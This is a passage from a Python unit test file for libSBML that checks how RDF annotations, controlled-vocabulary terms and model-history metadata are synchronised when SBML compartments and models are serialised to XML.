xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " <rdf:Description>\n" + " <rdf:other/>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected2,c.toSBML()) ) c.unsetModelHistory() c.unsetCVTerms() c.addCVTerm(cv) c.setModelHistory(mh) expected3 = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n" + " <annotation>\n" + " <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n" + " <jd2:header>\n" + " <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n" + " <jd2:ModelHeader Author=\"Mr Untitled\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n" + " <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n" + " </jd2:header>\n" + " </jd2:JDesignerLayout>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " <rdf:Description>\n" + " <rdf:other/>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected3,c.toSBML()) ) pass def test_SyncAnnotation_modifyCVTerms_1(self): c = self.m.getCompartment(4) cv = c.getCVTerm(0).clone() c.unsetCVTerms() c.addCVTerm(cv) expected = wrapString("<compartment metaid=\"_000012\" id=\"cc\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000012\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_modifyCVTerms_2(self): self.m.unsetCVTerms() expected = wrapString("<annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000001\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG>\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) ) pass def test_SyncAnnotation_modifyCVTerms_3(self): cv = self.m.getCVTerm(0).clone() self.m.unsetCVTerms() self.m.addCVTerm(cv) expected = wrapString("<annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000001\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family><NAME></vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG>\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) ) pass def test_SyncAnnotation_modifyCVTerms_4(self): cv = self.m.getCVTerm(0).clone() c = self.m.getCompartment(0) c.addCVTerm(cv) expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000002\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_modifyCVTerms_5(self): c = self.m.getCompartment(6) cv = c.getCVTerm(0).clone() c.unsetCVTerms() c.addCVTerm(cv) expected = wrapString("<compartment metaid=\"_000042\" id=\"cc1\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000042\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " <rdf:Description/>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_modifyHistory_1(self): c = self.m.getCompartment(3) mh = c.getModelHistory().clone() c.unsetModelHistory() c.setModelHistory(mh) expected = wrapString("<compartment metaid=\"_000004\" id=\"C\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000004\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_modifyHistory_2(self): self.m.unsetModelHistory() expected = wrapString("<annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000001\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) ) pass def test_SyncAnnotation_modifyHistory_3(self): mh = self.m.getModelHistory().clone() self.m.unsetModelHistory() self.m.setModelHistory(mh) expected = wrapString("<annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000001\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family><NAME></vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) ) pass def test_SyncAnnotation_modifyHistory_4(self): c = self.m.getCompartment(0) mh = self.m.getModelHistory().clone() c.setModelHistory(mh) expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000002\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family><NAME></vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_modifyHistory_5(self): c = self.m.getCompartment(5) mh = c.getModelHistory().clone() c.unsetModelHistory() c.setModelHistory(mh) expected = wrapString("<compartment metaid=\"_000032\" id=\"C1\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000032\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " </rdf:Description>\n" + " <rdf:other/>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_noChanges_1(self): c = self.m.getCompartment(1) expected = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n" + " <annotation>\n" + " <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n" + " <jd2:header>\n" + " <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n" + " <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n" + " <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n" + " </jd2:header>\n" + " </jd2:JDesignerLayout>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family><NAME></vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG>\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " <rdf:Description>\n" + " <rdf:other/>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_noChanges_2(self): expected = wrapString("<annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000001\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG>\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) ) pass def test_SyncAnnotation_stringChangesMetaid(self): c = libsbml.Compartment(3,1) c.setMetaId("_000005") c.setId("A") addedAnn = wrapString("<annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") c.setAnnotation(addedAnn) expected = wrapString("<compartment metaid=\"_000005\" id=\"A\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000005\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_stringChangesMetaid_1(self): c = libsbml.Model(2, 3) c.setMetaId("_000005") c.setId("A") addedAnn = wrapString("<annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family><NAME></vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") c.setAnnotation(addedAnn) expected = wrapString("<model metaid=\"_000005\" id=\"A\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000005\">\n" + " <dc:creator rdf:parseType=\"Resource\">\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG>\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</model>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_stringChangesMetaid_2(self): c = libsbml.Compartment(2,3) c.setMetaId("_000005") c.setId("A") addedAnn = wrapString("<annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" 